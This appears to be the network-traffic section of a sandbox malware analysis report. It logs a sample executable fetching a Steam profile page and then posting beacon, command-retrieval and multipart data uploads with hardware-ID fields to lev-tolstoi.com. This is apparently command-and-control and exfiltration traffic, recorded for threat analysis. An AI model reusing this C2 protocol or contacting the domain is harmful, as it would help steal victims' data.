                                                                                                                                                                                                                                2024-12-26 12:14:16 UTC3768INData Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 22
                                                                                                                                                                                                                                Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
                                                                                                                                                                                                                                2024-12-26 12:14:16 UTC490INData Raw: 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 74
                                                                                                                                                                                                                                Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.549705104.21.66.864435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-26 12:14:17 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                2024-12-26 12:14:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                2024-12-26 12:14:18 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:18 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=ua8pk86gfm4doq5ln13cgf1gqk; expires=Mon, 21 Apr 2025 06:00:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8tuaWDjHmGVFgi2RPrDd%2FALpPKgSgF5%2FQJEZB%2BLh7%2Byz6i2qZrHGPUlxewpPHo%2FG%2F3qBCbguyr2x1rbKFs9eNaQ2fNaSW1hVzTeonjoguExcn%2BRqWtmMvSu4n5ZAEw998Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8f80fd61f98743a4-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1573&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1781574&cwnd=232&unsent_bytes=0&cid=0eb1e422dad26a13&ts=793&x=0"
                                                                                                                                                                                                                                2024-12-26 12:14:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                Data Ascii: 2ok
                                                                                                                                                                                                                                2024-12-26 12:14:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.549706104.21.66.864435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-26 12:14:19 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 47
                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                2024-12-26 12:14:19 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:20 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=td889ts474u6mqbi4p5it10vlk; expires=Mon, 21 Apr 2025 06:00:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJExAa1UoOCR1gzwuslbn6ZUhiskQ6TjCwSp2tsYNlO1KvgmWnl%2BK3C%2Byc2OQeatcovAXwN8ygKdOgqodqpRieXlRSyUkajtA5seGZ6%2BgnLB%2BKuv83LCSvnC%2ByGFEvhdD%2BE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8f80fd6f5c2e18c8-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1503&min_rtt=1497&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=946&delivery_rate=1889967&cwnd=148&unsent_bytes=0&cid=162ff6b3b18d371f&ts=800&x=0"
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC240INData Raw: 33 64 64 37 0d 0a 42 71 5a 64 41 6b 7a 64 72 66 6c 77 72 43 76 50 64 30 64 42 4f 32 53 59 72 2b 55 74 41 77 44 30 68 30 61 46 72 6f 46 4a 70 38 42 39 68 43 73 67 64 75 6d 42 32 77 50 4a 43 66 55 44 4e 54 52 65 53 4c 72 4f 67 51 38 35 5a 70 58 72 4e 65 43 43 6f 7a 2f 4b 34 6a 7a 41 50 47 34 2f 75 49 48 62 46 64 51 4a 39 53 77 38 59 31 34 4b 75 70 58 48 53 47 6c 69 6c 65 73 6b 35 4d 58 75 4f 63 75 6a 62 73 6f 36 61 69 6d 2b 79 5a 67 63 77 55 36 71 45 69 59 72 56 51 33 31 78 34 67 50 4c 79 4b 52 2f 57 53 2f 6a 4d 77 73 30 36 46 4c 78 79 35 70 62 71 43 42 67 6c 4c 4a 52 65 31 4e 5a 53 42 65 42 76 54 4a 67 55 5a 72 61 4a 7a 6a 4a 65 48 45 38 53 44 42 71 47 37 45 4f 57 73 6a 74 39 32 56 46 73 5a 46 72 42 67 6d 59 78
                                                                                                                                                                                                                                Data Ascii: 3dd7BqZdAkzdrflwrCvPd0dBO2SYr+UtAwD0h0aFroFJp8B9hCsgdumB2wPJCfUDNTReSLrOgQ85ZpXrNeCCoz/K4jzAPG4/uIHbFdQJ9Sw8Y14KupXHSGlilesk5MXuOcujbso6aim+yZgcwU6qEiYrVQ31x4gPLyKR/WS/jMws06FLxy5pbqCBglLJRe1NZSBeBvTJgUZraJzjJeHE8SDBqG7EOWsjt92VFsZFrBgmYx
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1369INData Raw: 64 47 2f 64 58 48 46 79 45 78 70 4f 59 31 39 74 6e 75 4f 38 50 69 65 34 6f 6d 49 43 6d 7a 6a 38 4e 53 78 6b 57 6a 45 43 59 73 58 67 66 36 33 34 68 50 59 6d 71 65 34 53 37 6f 77 2b 77 6c 7a 36 56 73 7a 54 68 76 4b 62 66 4a 6c 42 47 4f 42 2b 30 53 50 57 4d 42 52 74 72 64 68 45 78 31 62 34 65 6c 4f 36 6e 56 6f 79 7a 4a 34 6a 79 45 4f 57 34 76 73 73 2b 4a 47 73 56 43 71 41 63 75 4b 6c 51 4c 2b 73 43 4e 51 47 4a 69 6b 65 38 75 36 4d 62 6e 4a 73 69 6b 5a 4d 52 2f 4c 6d 36 34 31 39 74 4b 6a 6d 71 6f 42 53 49 76 54 30 54 41 6a 5a 67 42 65 43 4b 52 36 57 53 2f 6a 4f 73 75 78 71 46 76 79 7a 78 6f 4a 61 33 50 69 52 54 44 54 4c 38 54 49 43 31 54 42 65 6a 48 69 55 6c 69 61 35 33 73 49 65 44 49 6f 32 57 46 70 58 79 45 5a 79 41 50 73 73 53 58 47 4e 6c 4a 37 51 70 72 4f
                                                                                                                                                                                                                                Data Ascii: dG/dXHFyExpOY19tnuO8Pie4omICmzj8NSxkWjECYsXgf634hPYmqe4S7ow+wlz6VszThvKbfJlBGOB+0SPWMBRtrdhEx1b4elO6nVoyzJ4jyEOW4vss+JGsVCqAcuKlQL+sCNQGJike8u6MbnJsikZMR/Lm6419tKjmqoBSIvT0TAjZgBeCKR6WS/jOsuxqFvyzxoJa3PiRTDTL8TIC1TBejHiUlia53sIeDIo2WFpXyEZyAPssSXGNlJ7QprO
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1369INData Raw: 42 6a 55 6c 75 62 35 71 6c 61 71 66 4c 2b 32 75 64 34 6b 37 48 4b 32 4d 6b 2f 66 71 59 48 4d 42 4f 75 31 55 36 62 55 42 47 2f 63 48 48 46 79 46 76 6c 2b 30 69 39 63 50 75 4b 4d 75 73 61 38 45 77 61 43 36 2f 77 70 34 57 78 55 4b 75 47 43 45 78 55 77 62 79 79 49 5a 46 61 79 4c 59 70 53 50 2f 6a 4c 74 72 39 4c 56 76 68 67 70 6a 49 4c 48 49 6a 56 4c 52 42 37 52 56 49 69 38 5a 58 72 72 41 6a 30 70 6b 62 5a 66 76 4b 75 4c 47 37 79 50 4c 6f 58 62 4c 4f 32 41 69 74 38 57 57 48 4d 70 42 70 42 34 75 4a 56 6b 48 38 49 33 4a 44 32 5a 36 31 72 31 6b 30 38 76 76 4a 73 72 67 55 63 63 78 62 69 6d 70 6a 34 52 63 31 77 6d 71 47 57 56 37 47 51 72 7a 7a 59 78 46 5a 57 4b 52 36 43 48 6b 79 2b 41 6d 77 71 68 71 77 7a 74 73 4a 37 4c 4a 6d 78 58 4b 54 4c 38 51 4c 43 39 56 52 72
                                                                                                                                                                                                                                Data Ascii: BjUlub5qlaqfL+2ud4k7HK2Mk/fqYHMBOu1U6bUBG/cHHFyFvl+0i9cPuKMusa8EwaC6/wp4WxUKuGCExUwbyyIZFayLYpSP/jLtr9LVvhgpjILHIjVLRB7RVIi8ZXrrAj0pkbZfvKuLG7yPLoXbLO2Ait8WWHMpBpB4uJVkH8I3JD2Z61r1k08vvJsrgUccxbimpj4Rc1wmqGWV7GQrzzYxFZWKR6CHky+AmwqhqwztsJ7LJmxXKTL8QLC9VRr
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1369INData Raw: 66 69 79 50 70 53 50 72 6a 4c 74 72 7a 4b 74 32 79 6a 46 70 49 37 6e 48 6e 42 7a 44 51 71 73 65 49 69 52 66 43 2f 4c 41 67 6b 78 67 5a 70 7a 33 4a 2b 7a 47 37 69 47 46 37 43 54 44 4a 79 42 32 2f 2b 69 58 4f 39 35 53 76 77 4e 6c 50 42 63 66 75 73 71 4c 44 7a 6b 69 6c 65 6f 74 36 4d 54 72 4a 4d 71 6d 61 73 49 35 62 53 75 77 78 59 6b 61 77 45 53 6d 47 69 34 78 57 51 76 2b 77 59 4e 48 61 6d 6a 57 71 32 54 67 31 4b 4e 7a 68 5a 64 70 79 7a 39 6a 4f 50 2f 51 31 51 75 4f 54 71 46 56 66 57 4e 56 43 50 72 43 69 30 4e 71 61 70 66 70 4b 75 44 4a 36 69 50 4e 73 47 58 41 4e 32 45 67 73 4d 36 66 46 38 74 4e 71 68 45 6a 4c 42 6c 49 75 73 71 66 44 7a 6b 69 75 63 49 52 70 65 33 5a 61 39 72 73 66 59 51 34 62 47 37 6e 6a 35 63 52 77 6b 47 69 45 79 77 76 55 77 2f 78 77 59 78
                                                                                                                                                                                                                                Data Ascii: fiyPpSPrjLtrzKt2yjFpI7nHnBzDQqseIiRfC/LAgkxgZpz3J+zG7iGF7CTDJyB2/+iXO95SvwNlPBcfusqLDzkileot6MTrJMqmasI5bSuwxYkawESmGi4xWQv+wYNHamjWq2Tg1KNzhZdpyz9jOP/Q1QuOTqFVfWNVCPrCi0NqapfpKuDJ6iPNsGXAN2EgsM6fF8tNqhEjLBlIusqfDzkiucIRpe3Za9rsfYQ4bG7nj5cRwkGiEywvUw/xwYx
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1369INData Raw: 75 41 72 35 73 33 6c 4f 63 4b 72 64 73 6f 79 62 79 61 33 78 70 6f 57 79 30 53 72 47 53 38 69 58 67 6a 30 78 63 63 42 49 57 57 4f 70 58 79 6e 37 66 4d 77 31 37 52 70 35 54 4a 76 62 71 43 42 67 6c 4c 4a 52 65 31 4e 5a 53 70 4c 41 76 66 66 6a 6b 68 76 62 5a 58 33 4a 65 72 48 38 53 7a 4b 70 6d 50 49 4f 57 38 6f 76 73 71 52 48 73 6c 4d 70 68 6f 70 59 78 64 47 2f 64 58 48 46 79 46 4d 6e 66 59 7a 35 4d 4c 6f 50 64 37 69 65 34 6f 6d 49 43 6d 7a 6a 38 4e 53 7a 55 4b 6d 45 53 55 76 57 51 4c 33 7a 5a 56 41 5a 6d 57 66 37 6a 62 74 79 2b 51 67 7a 61 6c 72 77 69 31 73 49 4b 33 4b 69 51 43 4f 42 2b 30 53 50 57 4d 42 52 73 7a 4b 6c 31 39 69 49 4b 66 7a 4a 2f 48 48 37 69 65 46 76 53 72 64 66 32 63 69 2f 35 66 62 46 4d 46 41 72 68 6f 6b 4b 6c 55 4c 2f 38 53 43 54 6d 64 6d
                                                                                                                                                                                                                                Data Ascii: uAr5s3lOcKrdsoybya3xpoWy0SrGS8iXgj0xccBIWWOpXyn7fMw17Rp5TJvbqCBglLJRe1NZSpLAvffjkhvbZX3JerH8SzKpmPIOW8ovsqRHslMphopYxdG/dXHFyFMnfYz5MLoPd7ie4omICmzj8NSzUKmESUvWQL3zZVAZmWf7jbty+Qgzalrwi1sIK3KiQCOB+0SPWMBRszKl19iIKfzJ/HH7ieFvSrdf2ci/5fbFMFArhokKlUL/8SCTmdm
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1369INData Raw: 54 58 6f 7a 53 4c 75 79 54 44 4d 79 42 32 2f 38 79 63 45 63 39 44 70 42 6b 71 4a 46 30 55 38 4d 71 56 54 6d 42 70 6d 2b 6b 6b 36 73 48 70 4b 73 79 76 61 4d 6b 34 5a 79 47 36 6a 39 56 53 79 56 48 74 54 57 55 43 56 41 33 32 6c 74 30 50 66 69 79 50 70 53 50 72 6a 4c 74 72 78 61 68 68 7a 6a 4a 6a 49 62 7a 64 6d 68 54 63 53 61 41 66 4e 79 6c 53 41 2f 66 41 69 6b 78 6e 5a 4a 33 70 4e 75 37 4d 34 43 43 46 37 43 54 44 4a 79 42 32 2f 2b 79 4d 42 4d 52 4f 6f 51 4d 75 49 6c 6f 51 39 39 33 48 41 53 46 7a 6b 66 52 6b 76 39 72 7a 50 4d 4b 39 4b 74 31 2f 5a 79 4c 2f 6c 39 73 55 78 30 2b 71 45 79 73 78 58 41 44 31 77 6f 35 47 5a 57 71 56 35 53 44 6a 79 2b 59 6f 79 61 6c 6a 78 7a 42 6b 4a 37 48 47 6c 46 4b 41 43 61 6f 4e 5a 58 73 5a 4a 2b 48 4f 69 30 49 68 66 64 6a 38 5a
                                                                                                                                                                                                                                Data Ascii: TXozSLuyTDMyB2/8ycEc9DpBkqJF0U8MqVTmBpm+kk6sHpKsyvaMk4ZyG6j9VSyVHtTWUCVA32lt0PfiyPpSPrjLtrxahhzjJjIbzdmhTcSaAfNylSA/fAikxnZJ3pNu7M4CCF7CTDJyB2/+yMBMROoQMuIloQ993HASFzkfRkv9rzPMK9Kt1/ZyL/l9sUx0+qEysxXAD1wo5GZWqV5SDjy+YoyaljxzBkJ7HGlFKACaoNZXsZJ+HOi0Ihfdj8Z
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1369INData Raw: 73 33 65 49 38 68 42 39 72 4f 4c 72 49 6a 56 44 37 53 71 4d 62 49 6a 55 5a 47 63 57 44 78 30 42 37 49 73 37 63 50 61 66 4c 37 32 75 64 34 6e 48 44 50 32 63 30 71 63 69 58 41 38 56 45 6f 54 63 71 4a 45 38 46 39 63 36 57 52 69 31 70 6d 36 56 71 70 38 76 37 61 35 33 69 53 38 4d 70 59 77 47 38 33 70 4a 53 67 41 6d 71 41 32 56 37 47 54 69 36 33 34 52 66 59 6d 32 48 32 32 53 2f 31 64 31 72 7a 72 52 6a 31 44 78 32 4a 62 4c 44 69 69 79 4f 45 66 6c 48 64 33 45 4c 56 4f 57 4e 6d 48 41 76 49 70 65 6c 66 4e 37 56 6f 7a 32 46 2b 6a 61 4b 66 33 4a 75 35 34 2f 63 45 64 78 62 71 78 59 7a 49 42 34 34 78 4f 71 52 52 57 5a 79 6b 66 49 72 70 34 4b 6a 4a 49 58 36 58 59 51 32 5a 7a 57 75 32 5a 59 43 79 51 6d 53 57 32 55 37 47 56 36 36 2b 49 52 42 62 32 57 41 39 47 6e 41 32 75
                                                                                                                                                                                                                                Data Ascii: s3eI8hB9rOLrIjVD7SqMbIjUZGcWDx0B7Is7cPafL72ud4nHDP2c0qciXA8VEoTcqJE8F9c6WRi1pm6Vqp8v7a53iS8MpYwG83pJSgAmqA2V7GTi634RfYm2H22S/1d1rzrRj1Dx2JbLDiiyOEflHd3ELVOWNmHAvIpelfN7Voz2F+jaKf3Ju54/cEdxbqxYzIB44xOqRRWZykfIrp4KjJIX6XYQ2ZzWu2ZYCyQmSW2U7GV66+IRBb2WA9GnA2u
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1369INData Raw: 57 73 55 79 62 32 4b 78 78 4a 73 56 33 6c 2b 32 57 53 30 67 51 78 7a 45 38 36 78 44 5a 32 57 4d 34 69 4c 42 37 4b 4e 6c 68 61 30 6b 6e 41 59 67 5a 76 2f 77 31 56 4c 57 43 66 56 56 45 43 42 58 43 50 33 62 6c 67 4a 4a 51 61 7a 66 5a 73 76 4c 39 6d 6e 78 70 58 54 56 4e 47 30 69 2f 34 48 62 46 49 34 52 2f 56 74 6c 4a 30 68 47 6f 70 33 56 46 44 51 78 77 62 56 32 2b 49 4c 36 61 39 50 69 50 4a 5a 78 49 44 7a 2f 6c 39 74 56 7a 56 75 2f 45 79 59 31 57 6b 48 45 38 36 42 42 5a 6d 4f 41 39 54 50 6f 38 74 30 2b 78 71 78 71 77 79 6c 78 62 76 47 50 6c 46 4b 57 63 4f 31 64 5a 52 77 58 52 75 4b 4e 33 77 39 55 59 5a 6a 72 49 2f 48 64 72 67 7a 4c 70 57 58 53 4c 33 63 68 2f 34 48 62 46 49 34 52 2f 31 74 6c 4a 30 68 47 6f 70 33 56 46 44 51 78 77 62 56 32 2b 49 4c 36 61 39 50
                                                                                                                                                                                                                                Data Ascii: WsUyb2KxxJsV3l+2WS0gQxzE86xDZ2WM4iLB7KNlha0knAYgZv/w1VLWCfVVECBXCP3blgJJQazfZsvL9mnxpXTVNG0i/4HbFI4R/VtlJ0hGop3VFDQxwbV2+IL6a9PiPJZxIDz/l9tVzVu/EyY1WkHE86BBZmOA9TPo8t0+xqxqwylxbvGPlFKWcO1dZRwXRuKN3w9UYZjrI/HdrgzLpWXSL3ch/4HbFI4R/1tlJ0hGop3VFDQxwbV2+IL6a9P
                                                                                                                                                                                                                                2024-12-26 12:14:20 UTC1369INData Raw: 32 30 68 75 49 32 37 46 64 68 4b 37 56 74 6c 4c 78 6c 65 75 73 79 4e 58 32 78 74 6b 61 6b 6a 2f 63 75 6a 5a 59 57 73 4a 4a 78 2f 59 53 53 76 77 70 51 56 67 6b 2b 6a 47 32 55 38 46 78 2b 36 32 38 63 58 4d 69 7a 57 39 32 53 2f 6a 4b 51 6f 31 37 42 69 78 79 6c 6a 61 59 48 78 74 67 44 4a 57 61 35 58 46 43 35 64 45 4f 2f 4f 6c 30 68 66 58 4c 76 33 49 2f 66 50 6f 52 72 54 6f 57 54 4b 4f 43 42 67 2f 39 66 62 53 6f 35 6b 76 78 49 31 49 42 6c 49 75 73 48 48 46 79 46 76 68 4f 49 30 35 49 44 6b 4d 63 4c 69 65 34 6f 6d 49 44 6a 2f 6c 38 68 63 6a 6c 76 74 54 57 56 6b 56 77 76 37 7a 6f 6c 4d 63 33 43 51 35 6a 4c 6b 69 39 30 56 36 4c 42 6a 31 44 77 69 48 37 4c 4c 6a 51 66 4e 57 61 6f 72 47 77 35 4c 41 65 72 4f 78 57 4e 6d 62 35 72 62 47 74 44 64 35 44 75 48 68 47 66 53
                                                                                                                                                                                                                                Data Ascii: 20huI27FdhK7VtlLxleusyNX2xtkakj/cujZYWsJJx/YSSvwpQVgk+jG2U8Fx+628cXMizW92S/jKQo17BixyljaYHxtgDJWa5XFC5dEO/Ol0hfXLv3I/fPoRrToWTKOCBg/9fbSo5kvxI1IBlIusHHFyFvhOI05IDkMcLie4omIDj/l8hcjlvtTWVkVwv7zolMc3CQ5jLki90V6LBj1DwiH7LLjQfNWaorGw5LAerOxWNmb5rbGtDd5DuHhGfS


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.549707104.21.66.864435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-12-26 12:14:22 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=RN9M0MOCCIEDMK7GH
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Content-Length: 12829
                                                                                                                                                                                                                                Host: lev-tolstoi.com
                                                                                                                                                                                                                                2024-12-26 12:14:22 UTC12829OUTData Raw: 2d 2d 52 4e 39 4d 30 4d 4f 43 43 49 45 44 4d 4b 37 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 44 45 37 36 35 41 36 42 36 44 44 44 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 52 4e 39 4d 30 4d 4f 43 43 49 45 44 4d 4b 37 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 52 4e 39 4d 30 4d 4f 43 43 49 45 44 4d 4b 37 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d
                                                                                                                                                                                                                                Data Ascii: --RN9M0MOCCIEDMK7GHContent-Disposition: form-data; name="hwid"A8DE765A6B6DDD2BBEBA0C6A975F1733--RN9M0MOCCIEDMK7GHContent-Disposition: form-data; name="pid"2--RN9M0MOCCIEDMK7GHContent-Disposition: form-data; name="lid"PsFKDg--pablo-
                                                                                                                                                                                                                                2024-12-26 12:14:23 UTC1131INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 26 Dec 2024 12:14:23 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=nr46v1tkbbujhudbfgbhj9qj71; expires=Mon, 21 Apr 2025 06:01:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wHwyHWLVzauTESNfa6gYnwiUOK%2B9tOYnXZV2zRxxFrvI%2Br%2FHKnXCE1n7aac%2F1KvfH%2B6rM0g7FyqedysqRYbDAA%2FsscPbrQ9IOXgisCtJyArumT7pvK9C4RGabn43caXrw5U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8f80fd7eedf4de98-EWR
                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1494&rtt_var=747&sent=18&recv=21&lost=0&retrans=1&sent_bytes=4212&recv_bytes=13767&delivery_rate=79203&cwnd=212&unsent_bytes=0&cid=a7f4520e04105a3a&ts=927&x=0"
                                                                                                                                                                                                                                2024-12-26 12:14:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                2024-12-26 12:14:23 UTC5INData Raw: 30 0d 0a 0d 0a
